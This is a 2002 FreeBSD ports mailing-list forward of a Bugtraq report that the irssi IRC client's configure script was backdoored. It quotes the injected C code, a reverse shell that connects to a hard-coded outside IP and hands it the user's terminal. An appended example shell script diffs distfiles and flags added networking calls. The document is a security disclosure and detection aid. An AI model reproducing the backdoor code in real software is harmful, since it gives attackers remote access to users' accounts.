Date: Sat, 25 May 2002 10:31:08 -0500
From: "Jacques A. Vidrine"
To: ports@FreeBSD.org
Subject: Fwd: [irssi backdoored.]
Message-ID: <20020525153108.GA47077@hellblazer.nectar.cc>

This is why we _must_ always compare updated port distribution files
when the checksum changes.

--
Jacques A. Vidrine                 http://www.nectar.cc/
NTT/Verio SME . FreeBSD UNIX . Heimdal Kerberos
jvidrine@verio.net . nectar@FreeBSD.org . nectar@kth.se

----- Forwarded message from Martin Östlund -----

Date: Sat, 25 May 2002 16:58:05 +0200
From: Martin Östlund
To: bugtraq@securityfocus.com
Subject: irssi backdoored.

Hi readers.

I just discovered this on the irssi homepage (irssi is a new, popular
IRC chat client for those who didn't know).

"Just noticed, not sure for how long it's been there. I heard the first
change in the irssi-0.8.4.tar.gz's checksum was 2002/04/19. Guess I'll
have to start watching those myself from now on..

I'm moving the main.irssi.org elsewhere for now, mirrors should pick up
the DNS change and update themselves automatically..

This code was found from configure - it forks a new process, connects to
some server and gives stdin/out/err to it (ie. giving remote access to
your account):

    int s;
    struct sockaddr_in sa;
    switch(fork()) { case 0: break; default: exit(0); }
    if((s = socket(AF_INET, SOCK_STREAM, 0)) == (-1)) {
      exit(1);
    }
    /* HP/UX 9 (%@#!) writes to sscanf strings */
    memset(&sa, 0, sizeof(sa));
    sa.sin_family = AF_INET;
    sa.sin_port = htons(6667);
    sa.sin_addr.s_addr = inet_addr("204.120.36.206");
    if(connect(s, (struct sockaddr *)&sa, sizeof(sa)) == (-1)) {
      exit(1);
    }
    dup2(s, 0); dup2(s, 1); dup2(s, 2);

Also the IP just changed yesterday from 209.164.15.215.

If you still have the irssi sources, you can see if you're affected with

    grep SOCK_STREAM configure

- if it returns anything, something might have been done to your system."

- End of quote.

Take care,
Martin Östlund.

----- End forwarded message -----
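
Added example, not part of the original thread and not FreeBSD or irssi tooling: a shell script for the comparison the message asks for, diffing the previously fetched distfile against the changed one and flagging added lines that contain the networking calls seen in the quoted snippet. The function names, the token list and the use of cmp in place of the port's recorded checksum are assumptions.

```sh
#!/bin/sh
# Added example, not from the original thread. When a distfile changes under
# the same name, diff the old and new trees and flag added networking calls.

# Tokens taken from the backdoor snippet quoted above (assumed list). A hit is
# a reason to read the diff, not proof; no hit does not clear the file.
SUSPECT_RE='SOCK_STREAM|sockaddr_in|inet_addr|connect *\(|dup2 *\('

# unpack_to TARBALL DIR: extract a gzip-compressed tarball into DIR.
unpack_to() {
    mkdir -p "$2" && gzip -dc "$1" | tar -xf - -C "$2"
}

# distfile_diff OLD NEW: print a unified diff of the two unpacked trees.
# Returns 0 if the tarballs are byte-identical, 1 if they differ (the diff may
# be empty if only the packaging changed), 2 on error.
distfile_diff() {
    if cmp -s "$1" "$2"; then
        return 0
    fi
    work=$(mktemp -d) || return 2
    if ! { unpack_to "$1" "$work/old" && unpack_to "$2" "$work/new"; }; then
        rm -rf "$work"
        return 2
    fi
    (cd "$work" && diff -ruN old new) || true
    rm -rf "$work"
    return 1
}

# suspicious_additions OLD NEW: print only the added lines that match
# SUSPECT_RE. Returns 0 if any were found, 1 if none.
suspicious_additions() {
    distfile_diff "$1" "$2" |
        grep -E "^\+.*($SUSPECT_RE)" | grep -v '^+++ '
}

# Usage: sh distdiff.sh old.tar.gz new.tar.gz
if [ "$#" -eq 2 ]; then
    distfile_diff "$1" "$2" || true
    echo "== added lines matching networking tokens =="
    suspicious_additions "$1" "$2" || echo "(none)"
fi
```

Unlike grepping a single configure script, diffing against the earlier tarball shows only what changed, so socket tests that were already present in the older release do not show up as hits.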